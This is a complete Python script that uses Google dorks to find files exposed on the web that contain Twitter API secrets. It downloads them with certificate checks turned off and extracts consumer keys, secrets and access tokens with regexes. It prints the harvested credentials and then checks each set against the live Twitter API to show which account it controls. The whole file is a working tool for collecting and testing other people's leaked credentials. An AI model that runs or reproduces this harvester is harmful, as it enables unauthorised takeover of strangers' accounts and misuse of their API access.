#!/usr/bin/env python3

# pip install python-twitter
# pip install colored
# pip install google

import re
import urllib3
import twitter
import requests
import colored
import googlesearch

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

dorks = []
dork_extensions = ['yml', 'yaml', 'json', 'env', 'ini', 'cnf', 'php', 'txt']
dork_queries = [
    'CONSUMER_SECRET',
    'TOKEN_SECRET',
    'OAUTH_TOKEN_SECRET',
    'ACCESS_TOKEN_SECRET'
]

for extension in dork_extensions:
    for query in dork_queries:
        dorks.append('filetype:' + extension + ' "twitter" "' + query + '"')

regex_twitter_consumer_key = [
    (re.compile(r'''(TWITTER_)?CONSUMER(_KEY)?("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 6),
    (re.compile(r'TWITTER_CONSUMER(_KEY)?=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 2),
    (re.compile(r'''TWITTER_CONSUMER(_KEY)?("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 4),
    (re.compile(r'''TWITTER_CONSUMER(_KEY)?("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 4)
]

regex_twitter_access_token_key = [
    (re.compile(r'''((TWITTER_)?ACCESS_TOKEN(_KEY)?|(TWITTER_)?oauth_token)("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 8),
    (re.compile(r'(TWITTER_ACCESS_TOKEN(_KEY)?|twitter_oauth_token)=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 3),
    (re.compile(r'''(TWITTER_ACCESS_TOKEN(_KEY)?|twitter_oauth_token)("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 4),
    (re.compile(r'''(TWITTER_ACCESS_TOKEN(_KEY)?|twitter_oauth_token)("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 5)
]

regex_twitter_consumer_secret = [
    (re.compile(r'''(TWITTER_)?CONSUMER_SECRET("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 5),
    (re.compile(r'(TWITTER_CONSUMER_SECRET)=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 2),
    (re.compile(r'''(TWITTER_CONSUMER_SECRET)("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 5),
    (re.compile(r'''(TWITTER_CONSUMER_SECRET)("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 4)
]

regex_twitter_access_token_secret = [
    (re.compile(r'''((TWITTER_)?ACCESS(_TOKEN)?_SECRET|(TWITTER_)?TOKEN_SECRET|(TWITTER_)?oauth_token_secret)("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 9),
    (re.compile(r'(TWITTER_ACCESS_TOKEN_SECRET|TWITTER_TOKEN_SECRET|twitter_oauth_token_secret)=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 2),
    (re.compile(r'''(TWITTER_ACCESS_TOKEN_SECRET|TWITTER_TOKEN_SECRET|twitter_oauth_token_secret)("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 4),
    (re.compile(r'''(TWITTER_ACCESS_TOKEN_SECRET|TWITTER_TOKEN_SECRET|twitter_oauth_token_secret)("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 4)
]

def regex_ordered_array_search(regexs, content):
    for regex in regexs:
        try:
            result = regex[0].search(content).group(regex[1])

            if result:
                return result
        except Exception as e:
            continue

    return None

parsed = []

for dork in dorks:
    print('------------------------------')
    print('Trying dork: ' + dork)

    for url in googlesearch.search(dork, num=10, stop=None, pause=2):

        if url in parsed:
            continue

        parsed.append(url)

        try:
            response = requests.get(url, verify=False, timeout=5)
            content = response.content.decode('utf-8')

            twitter_consumer_key = regex_ordered_array_search(regex_twitter_consumer_key, content)
            twitter_consumer_secret = regex_ordered_array_search(regex_twitter_consumer_secret, content)
            twitter_access_token_key = regex_ordered_array_search(regex_twitter_access_token_key, content)
            twitter_access_token_secret = regex_ordered_array_search(regex_twitter_access_token_secret, content)
        except Exception as e:
            continue

        if not twitter_consumer_key:
            continue

        if not twitter_consumer_secret:
            continue

        if not twitter_access_token_key:
            continue

        if not twitter_access_token_secret:
            continue

        print('------------------------------')
        print((('%s{}%s') % (colored.attr(1), colored.attr(0))).format(url))
        print('\tConsumer Key: ' + twitter_consumer_key)
        print('\tConsumer Secret: ' + twitter_consumer_secret)
        print('\tAccess Token Key: ' + twitter_access_token_key)
        print('\tAccess Token Secret: ' + twitter_access_token_secret)

        api = twitter.Api(
            consumer_key=twitter_consumer_key,
            consumer_secret=twitter_consumer_secret,
            access_token_key=twitter_access_token_key,
            access_token_secret=twitter_access_token_secret
        )

        try:
            identity = api.VerifyCredentials()
            print(('%s\tName: @' + identity.screen_name + ', Last Tweet: ' + identity.created_at + '%s') % (colored.fg(2), colored.attr(0)))
        except Exception as e:
            print(('%s\tError: ' + str(e) + '%s') % (colored.fg(1), colored.attr(0)))